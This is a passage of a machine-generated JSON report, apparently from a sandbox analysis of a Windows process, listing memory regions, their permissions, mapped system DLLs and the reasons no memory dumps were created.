"max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_1923", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:01:15.869", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_1924", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:01:15.869", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1925", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:15.870", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_1926", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:15.870", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_1927", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:01:15.870", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 4718592, "type": "region", "version": 1 }, "end_va": 5242879, "entry_point": 0, "filename": null, "id": "region_1928", "name": "private_0x0000000000480000", "norm_filename": null, "region_type": "private_memory", "start_va": 4718592, "timestamp": "00:01:15.910", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1945960448, "type": "region", "version": 1 }, "end_va": 1945993215, "entry_point": 1945968888, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_1929", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1945960448, "timestamp": "00:01:15.910", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1946025984, "type": "region", "version": 1 }, "end_va": 1946402815, "entry_point": 1946285976, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_1930", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1946025984, "timestamp": "00:01:15.911", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1946419200, "type": "region", "version": 1 }, "end_va": 1946677247, "entry_point": 1946607224, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_1931", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1946419200, "timestamp": "00:01:15.911", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2001338368, "type": "region", "version": 1 }, "end_va": 2002362367, "entry_point": 0, "filename": null, "id": "region_1932", "name": "private_0x00000000774a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2001338368, "timestamp": "00:01:15.912", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2002386944, "type": "region", "version": 1 }, "end_va": 2003562495, "entry_point": 0, "filename": null, "id": "region_1933", "name": "private_0x00000000775a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2002386944, "timestamp": "00:01:15.912", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1934", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:16.458", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1935", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:16.458", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 880639, "entry_point": 458752, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1936", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 458752, "timestamp": "00:01:16.459", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 1048576, "type": "region", "version": 1 }, "end_va": 1114111, "entry_point": 0, "filename": null, "id": "region_1937", "name": "private_0x0000000000100000", "norm_filename": null, "region_type": "private_memory", "start_va": 1048576, "timestamp": "00:01:16.459", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 7208960, "type": "region", "version": 1 }, "end_va": 8257535, "entry_point": 0, "filename": null, "id": "region_1938", "name": "private_0x00000000006e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 7208960, "timestamp": "00:01:16.459", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 962560, "start_va": 1787428864, "type": "region", "version": 1 }, "end_va": 1788391423, "entry_point": 1787428864, "filename": "\\Windows\\SysWOW64\\dbghelp.dll", "id": "region_1939", "name": "dbghelp.dll", "norm_filename": "c:\\windows\\syswow64\\dbghelp.dll", "region_type": "memory_mapped_file", "start_va": 1787428864, "timestamp": "00:01:16.459", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1788411904, "type": "region", "version": 1 }, "end_va": 1788473343, "entry_point": 1788411904, "filename": "\\Windows\\SysWOW64\\wkscli.dll", "id": "region_1940", "name": "wkscli.dll", "norm_filename": "c:\\windows\\syswow64\\wkscli.dll", "region_type": "memory_mapped_file", "start_va": 1788411904, "timestamp": "00:01:16.470", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1788477440, "type": "region", "version": 1 }, "end_va": 1788514303, "entry_point": 1788482982, "filename": "\\Windows\\SysWOW64\\netutils.dll", "id": "region_1941", "name": "netutils.dll", "norm_filename": "c:\\windows\\syswow64\\netutils.dll", "region_type": "memory_mapped_file", "start_va": 1788477440, "timestamp": "00:01:16.477", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 69632, "start_va": 1788542976, "type": "region", "version": 1 }, "end_va": 1788612607, "entry_point": 1788542976, "filename": "\\Windows\\SysWOW64\\netapi32.dll", "id": "region_1942", "name": "netapi32.dll", "norm_filename": "c:\\windows\\syswow64\\netapi32.dll", "region_type": "memory_mapped_file", "start_va": 1788542976, "timestamp": "00:01:16.478", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1788674048, "type": "region", "version": 1 }, "end_va": 1788891135, "entry_point": 1788674048, "filename": "\\Windows\\SysWOW64\\framedynos.dll", "id": "region_1943", "name": "framedynos.dll", "norm_filename": "c:\\windows\\syswow64\\framedynos.dll", "region_type": "memory_mapped_file", "start_va": 1788674048, "timestamp": "00:01:16.486", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1941569536, "type": "region", "version": 1 }, "end_va": 1941643263, "entry_point": 1941574144, "filename": "\\Windows\\SysWOW64\\mpr.dll", "id": "region_1944", "name": "mpr.dll", "norm_filename": "c:\\windows\\syswow64\\mpr.dll", "region_type": "memory_mapped_file", "start_va": 1941569536, "timestamp": "00:01:16.498", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1944256512, "type": "region", "version": 1 }, "end_va": 1944309759, "entry_point": 1944256512, "filename": "\\Windows\\SysWOW64\\wtsapi32.dll", "id": "region_1945", "name": "wtsapi32.dll", "norm_filename": "c:\\windows\\syswow64\\wtsapi32.dll", "region_type": "memory_mapped_file", "start_va": 1944256512, "timestamp": "00:01:16.499", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1946681344, "type": "region", "version": 1 }, "end_va": 1946714111, "entry_point": 1946685673, "filename": "\\Windows\\SysWOW64\\secur32.dll", "id": "region_1946", "name": "secur32.dll", "norm_filename": "c:\\windows\\syswow64\\secur32.dll", "region_type": "memory_mapped_file", "start_va": 1946681344, "timestamp": "00:01:16.505", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1958019072, "type": "region", "version": 1 }, "end_va": 1958055935, "entry_point": 1958023712, "filename": "\\Windows\\SysWOW64\\version.dll", "id": "region_1947", "name": "version.dll", "norm_filename": "c:\\windows\\syswow64\\version.dll", "region_type": "memory_mapped_file", "start_va": 1958019072, "timestamp": "00:01:16.505", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1966276608, "type": "region", "version": 1 }, "end_va": 1966379007, "entry_point": 1966281497, "filename": "\\Windows\\SysWOW64\\srvcli.dll", "id": "region_1948", "name": "srvcli.dll", "norm_filename": "c:\\windows\\syswow64\\srvcli.dll", "region_type": "memory_mapped_file", "start_va": 1966276608, "timestamp": "00:01:16.506", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1967063040, "type": "region", "version": 1 }, "end_va": 1967112191, "entry_point": 1967067361, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_1949", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1967063040, "timestamp": "00:01:16.506", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1967128576, "type": "region", "version": 1 }, "end_va": 1967521791, "entry_point": 1967236019, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_1950", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1967128576, "timestamp": "00:01:16.506", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1968832512, "type": "region", "version": 1 }, "end_va": 1969537023, "entry_point": 1968874610, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_1951", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1968832512, "timestamp": "00:01:16.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1983840256, "type": "region", "version": 1 }, "end_va": 1984495615, "entry_point": 1983924709, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_1952", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1983840256, "timestamp": "00:01:16.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1985085440, "type": "region", "version": 1 }, "end_va": 1986199551, "entry_point": 1985163987, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_1953", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985085440, "timestamp": "00:01:16.508", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1986592768, "type": "region", "version": 1 }, "end_va": 1987575807, "entry_point": 1986659689, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_1954", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1986592768, "timestamp": "00:01:16.508", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1987932159, "entry_point": 1987681190, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_1955", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:01:16.509", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1989214208, "type": "region", "version": 1 }, "end_va": 1989799935, "entry_point": 1989230513, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_1956", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1989214208, "timestamp": "00:01:16.509", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1989804032, "type": "region", "version": 1 }, "end_va": 1989906431, "entry_point": 1989822837, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_1957", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1989804032, "timestamp": "00:01:16.510", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1992818688, "type": "region", "version": 1 }, "end_va": 1992843263, "entry_point": 1992824706, "filename": "\\Windows\\SysWOW64\\nsi.dll", "id": "region_1958", "name": "nsi.dll", "norm_filename": "c:\\windows\\syswow64\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 1992818688, "timestamp": "00:01:16.510", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1992884224, "type": "region", "version": 1 }, "end_va": 1993527295, "entry_point": 1993097175, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_1959", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1992884224, "timestamp": "00:01:16.511", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1993539584, "type": "region", "version": 1 }, "end_va": 1994964991, "entry_point": 1993849405, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_1960", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1993539584, "timestamp": "00:01:16.511", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1995046912, "type": "region", "version": 1 }, "end_va": 1995087871, "entry_point": 1995060896, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_1961", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1995046912, "timestamp": "00:01:16.511", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1997733888, "type": "region", "version": 1 }, "end_va": 1997950975, "entry_point": 1997739101, "filename": "\\Windows\\SysWOW64\\ws2_32.dll", "id": "region_1962", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\syswow64\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1997733888, "timestamp": "00:01:16.512", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1999372288, "type": "region", "version": 1 }, "end_va": 1999659007, "entry_point": 1999402104, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_1963", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1999372288, "timestamp": "00:01:16.512", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1999699968, "type": "region", "version": 1 }, "end_va": 2000748543, "entry_point": 1999812333, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_1964", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1999699968, "timestamp": "00:01:16.513", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 2000748544, "type": "region", "version": 1 }, "end_va": 2001338367, "entry_point": 2000839491, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_1965", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 2000748544, "timestamp": "00:01:16.513", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_1966", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:16.513", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1967", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:16.514", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 2752512, "type": "region", "version": 1 }, "end_va": 4358143, "entry_point": 0, "filename": null, "id": "region_1968", "name": "pagefile_0x00000000002a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2752512, "timestamp": "00:01:16.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1987969024, "type": "region", "version": 1 }, "end_va": 1988362239, "entry_point": 1988040079, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_1969", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1987969024, "timestamp": "00:01:16.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1998520320, "type": "region", "version": 1 }, "end_va": 1999355903, "entry_point": 1998526091, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_1970", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1998520320, "timestamp": "00:01:16.520", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 225279, "entry_point": 0, "filename": null, "id": "region_1971", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:16.567", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 925695, "entry_point": 0, "filename": null, "id": "region_1972", "name": "pagefile_0x00000000000e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 917504, "timestamp": "00:01:16.567", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16384, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 999423, "entry_point": 983040, "filename": "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui", "id": "region_1973", "name": "taskkill.exe.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui", "region_type": "memory_mapped_file", "start_va": 983040, "timestamp": "00:01:16.567", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1114112, "type": "region", "version": 1 }, "end_va": 1118207, "entry_point": 0, "filename": null, "id": "region_1974", "name": "private_0x0000000000110000", "norm_filename": null, "region_type": "private_memory", "start_va": 1114112, "timestamp": "00:01:16.572", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1179648, "type": "region", "version": 1 }, "end_va": 1183743, "entry_point": 0, "filename": null, "id": "region_1975", "name": "private_0x0000000000120000", "norm_filename": null, "region_type": "private_memory", "start_va": 1179648, "timestamp": "00:01:16.572", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1245184, "type": "region", "version": 1 }, "end_va": 1249279, "entry_point": 0, "filename": null, "id": "region_1976", "name": "pagefile_0x0000000000130000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1245184, "timestamp": "00:01:16.572", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 2228224, "type": "region", "version": 1 }, "end_va": 2490367, "entry_point": 0, "filename": null, "id": "region_1977", "name": "private_0x0000000000220000", "norm_filename": null, "region_type": "private_memory", "start_va": 2228224, "timestamp": "00:01:16.572", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 4390912, "type": "region", "version": 1 }, "end_va": 4653055, "entry_point": 0, "filename": null, "id": "region_1978", "name": "private_0x0000000000430000", "norm_filename": null, "region_type": "private_memory", "start_va": 4390912, "timestamp": "00:01:16.572", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 5242880, "type": "region", "version": 1 }, "end_va": 6819839, "entry_point": 0, "filename": null, "id": "region_1979", "name": "pagefile_0x0000000000500000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5242880, "timestamp": "00:01:16.572", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 8257536, "type": "region", "version": 1 }, "end_va": 29229055, "entry_point": 0, "filename": null, "id": "region_1980", "name": "pagefile_0x00000000007e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8257536, "timestamp": "00:01:16.573", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 29229056, "type": "region", "version": 1 }, "end_va": 30015487, "entry_point": 29229056, "filename": "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui", "id": "region_1981", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 29229056, "timestamp": "00:01:16.573", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 31457280, "type": "region", "version": 1 }, "end_va": 31719423, "entry_point": 0, "filename": null, "id": "region_1982", "name": "private_0x0000000001e00000", "norm_filename": null, "region_type": "private_memory", "start_va": 31457280, "timestamp": "00:01:16.573", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": 